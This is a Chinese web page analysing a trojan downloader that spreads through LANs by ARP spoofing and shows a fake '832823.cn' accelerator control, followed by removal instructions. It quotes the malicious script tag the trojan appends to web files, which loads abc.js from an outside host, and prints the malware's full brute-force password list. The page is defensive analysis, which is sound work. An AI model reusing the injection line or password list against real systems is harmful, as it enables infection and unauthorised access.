关于打开IE出现832823.cn的网络应用加速器的解决_电脑软硬件应用网

　　最近很多人反映局域网内众多电脑出现打开任何网页就出现加载832823.cn的加速器控件的症状
拿到了病毒样本，分析了一下：

　　这是一个木马下载器，并可以在局域网内发起arp欺骗攻击，使得中毒用户打开任意网页都会出现安装832823.cn的加速器控件，如图.

　　其实这个控件是一个abc.cab的压缩包里面TestSign.exe为病毒主体，并非所谓的网络加速器，TestSign.inf为相应安装信息

　　病毒运行后:

　　1.释放如下副本：
　　%systemroot%\system32\com\comrepl32.exe
　　%systemroot%\system32\config\AppEventw.cfg

　　%systemroot%\system32\drivers\pcibus.sys

　　2.添加注册表启动项目

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run下面添加
<comrepl32><%systemroot%\system32\com\comrepl32.exe> 的项目达到开机启动的目的

　　3.启动一个svchost.exe进程，将自身代码注入到该svchost.exe进程中，并通过svchost.exe进程下载　　　　　　http://*/elf_listo.txt到system32\taimpo.txt并读取里面的内容（里面一般为要下载的病毒文件列表）,之后下载http://*/*1.exe~http://*/*21.exe到C:\并命名为conime.exe~conime0.exe

　　4.感染非系统分区下的htm/.html/.asp/.jsp/.php文件,在其后面添加＜script language=javascript src=http://*/abc.js＞＜/script＞的代码

　　5.试图以下列密码连接局域网内其他用户电脑，并可能发送类似＜script language=javascript src=http://*/abc.js＞＜/script＞的数据包。(但未证实)

901100
mypass123
mypass
admin123
mypc123
mypc
love
pw123
Login
login
owner
home
zxcv
yxcv
qwer
asdf
temp123
temp
test123
test
fuck
fuckyou
root
ator
administrator
patrick
123abc
1234qwer
123123
121212
111111
alpha
2600
2003
2002
enable
godblessyou
ihavenopass
123asd
super
computer
server
123qwe
sybase
abc123
abcd
database
passwd
pass
88888888
11111111
000000
54321
654321
123456789
1234567
qq520
5201314
admin
12345
12345678
mein
letmein
2112
baseball
qwerty
7777
5150
fish
1313
shadow
1111
mustang
pussy
golf
123456
harley
6969
password
1234

　　当局域网中有用户中毒时，会自动执行http://*/abc.js的代码，从而下载http://*/abc.cab文件，宏观表现即为打开任何网页都会出现加载832823.cn的加速器控件的情况,上述下载的木马和病毒中几乎都是盗号木马，最后一个为机器狗病毒，该病毒可以突破还原卡并修改userinit.exe文件，使得userinit.exe成为一个新的木马下载者.

　　上述病毒木马植入完毕后，中毒机器的sreng日志如下：

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
       <upxdnd><%systemroot%\upxdnd.exe>     []
       <WinForm><%systemroot%\WinForm.exe>     []
       <MsIMMs32><%systemroot%\MsIMMs32.exe>     []
       <GenProtect><%systemroot%\GenProtect.exe>     []
       <cmdbcs><%systemroot%\cmdbcs.exe>     []
       <AVPSrv><%systemroot%\AVPSrv.exe>     []
       <NVDispDrv><%systemroot%\NVDispDrv.exe>     []
       <WinSysW><%systemroot%\swchost.exe>     []
       <KVP><%systemroot%\system32\drivers\svchost.exe>     []
       <Kvsc3><%systemroot%\Kvsc3.exe>     []
       <WinSysM><%systemroot%\IGM.exe>     []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
       <comrepl32><%systemroot%\system32\com\comrepl32.exe>     []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
       <{383D0D27-789F-4543-9760-D4E199623476}><%systemroot%\system32\ikewriyriu.dll>     [Microsoft Corporation]
       <{5BD41097-3693-4133-820E-FDAC57AF00E2}><%Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys>     []
       <{09F8A0EB-ED61-4714-B0AD-7EAFF5361A8B}><%systemroot%\system32\zhjtrx.dll>     []
==================================
正在运行的进程
[PID: 1684][%systemroot%\Explorer.exe]     [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
       [%Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys]     [N/A, ]
       [%systemroot%\system32\zhjtrx.dll]     [N/A, ]
       [%systemroot%\system32\upxdnd.dll]     [N/A, ]
       [%systemroot%\system32\AVPSrv.dll]     [N/A, ]
       [%systemroot%\system32\MsIMMs32.dll]     [N/A, ]
       [%systemroot%\system32\WinForm.dll]     [N/A, ]
       [%systemroot%\system32\Kvsc3.dll]     [N/A, ]
       [%systemroot%\system32\cmdbcs.dll]     [N/A, ]
       [%systemroot%\system32\NVDispDrv.dll]     [N/A, ]
       [%systemroot%\system32\GenProtect.dll]     [N/A, ]
       [%systemroot%\system32\ikewriyriu.dll]     [Microsoft Corporation, 5.1.2600.3099]
==================================
　　Winsock 提供者
MSAPI Tcpip [TCP/IP]
       %systemroot%\system32\sqmapi32.dll(, N/A)
MSAPI Tcpip [UDP/IP]
       %systemroot%\system32\sqmapi32.dll(, N/A)

......

　　清除办法：

　　局域网中的用户如果遇到了打开任意网页都出现加载832823.cn的加速器控件的情况，需要查找相应的中毒机器。找到后可以按照如下方法进行杀毒操作。

　　sreng(该软件下载地址：down.45its.com)：

　　一、清除病毒主程序

　　1.打开sreng
　　启动项目注册表删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
<comrepl32><%systemroot%\system32\com\comrepl32.exe> []

　　2.双击我的电脑，工具，文件夹选项，查看，单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件（推荐）"前面的钩。在提示确定更改时，单击“是” 然后确定，删除如下文件

%systemroot%\system32\com\comrepl32.exe
%systemroot%\system32\config\AppEventw.cfg

%systemroot%\system32\drivers\pcibus.sys

　　二、清除病毒下载的木马(由于病毒连接的服务器上的木马几乎天天更新，所以以下方法仅供参考)

　　1.打开sreng
　　启动项目     注册表删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
       <upxdnd><%systemroot%\upxdnd.exe>     []
       <WinForm><%systemroot%\WinForm.exe>     []
       <MsIMMs32><%systemroot%\MsIMMs32.exe>     []
       <GenProtect><%systemroot%\GenProtect.exe>     []
       <cmdbcs><%systemroot%\cmdbcs.exe>     []
       <AVPSrv><%systemroot%\AVPSrv.exe>     []
       <NVDispDrv><%systemroot%\NVDispDrv.exe>     []
       <WinSysW><%systemroot%\swchost.exe>     []
       <KVP><%systemroot%\system32\drivers\svchost.exe>     []
       <Kvsc3><%systemroot%\Kvsc3.exe>     []
       <WinSysM><%systemroot%\IGM.exe>     []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
       <{383D0D27-789F-4543-9760-D4E199623476}><%systemroot%\system32\ikewriyriu.dll>     [Microsoft Corporation]
       <{5BD41097-3693-4133-820E-FDAC57AF00E2}><%Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys>     []
       <{09F8A0EB-ED61-4714-B0AD-7EAFF5361A8B}><%systemroot%\system32\zhjtrx.dll>     []

　　系统修复高级修复里面选择重置winsock 重启计算机，重启后双击我的电脑，工具，文件夹选项，查看，单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件（推荐）"前面的钩。在提示确定更改时，单击“是” 然后确定

　　删除如下文件
%Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys
%Program Files%\Internet Explorer\PLUGINS\NvSys74.Tao
%Program Files%\Internet Explorer\PLUGINS\NvWin75.Jmp
%systemroot%\system32\drivers\pcibus.sys
%systemroot%\system32\drivers\svchost.exe
%systemroot%\system32\AVPSrv.dll
%systemroot%\system32\cmdbcs.dll
%systemroot%\system32\djatl.dll
%systemroot%\system32\GenProtect.dll
%systemroot%\system32\gjatl.dll
%systemroot%\system32\ikewriyriu.dll
%systemroot%\system32\Kvsc3.dll
%systemroot%\system32\MsIMMs32.dll
%systemroot%\system32\msplay32.dll
%systemroot%\system32\NVDispDrv.dll
%systemroot%\system32\sqmapi32.dll
%systemroot%\system32\upxdnd.dll
%systemroot%\system32\WinForm.dll
%systemroot%\system32\wlatl.dll
%systemroot%\system32\zhjtrx.dll
%systemroot%\system32\zxatl.dll
%systemroot%\AVPSrv.exe
%systemroot%\cmdbcs.exe
%systemroot%\GenProtect.exe
%systemroot%\IGM.exe
%systemroot%\Kvsc3.exe
%systemroot%\MsIMMs32.exe
%systemroot%\NVDispDrv.exe
%systemroot%\swchost.exe
%systemroot%\upxdnd.exe
%systemroot%\WinForm.exe
%systemroot%\system32\sqmapi32.dll

　　2.修复被感染的html等网页文件

　　推荐使用CSI的iframkill
　　下载地址：http://www.vaid.cn/blog/read.php?9

　　3.建议广大网管屏蔽这个ip地址：60.190.101.206

最新热点		最新推荐		相关文章
				删不掉的"淘宝图标"来侵教你删"淘宝… 微软高危漏洞"快捷方式自动执行"手工… acad.vlx删除方法 360se.exe病毒清除解决方案 regedit32.exe 病毒清除解决方案 3874jr98.exe,long.exe等病毒清除解… RG8.tmp病毒清除解决方案 139ujf939.exe,2.exe等病毒清除解决… EntSoQn.exe病毒清除解决方案 360safess.net.exe等病毒清除解决方…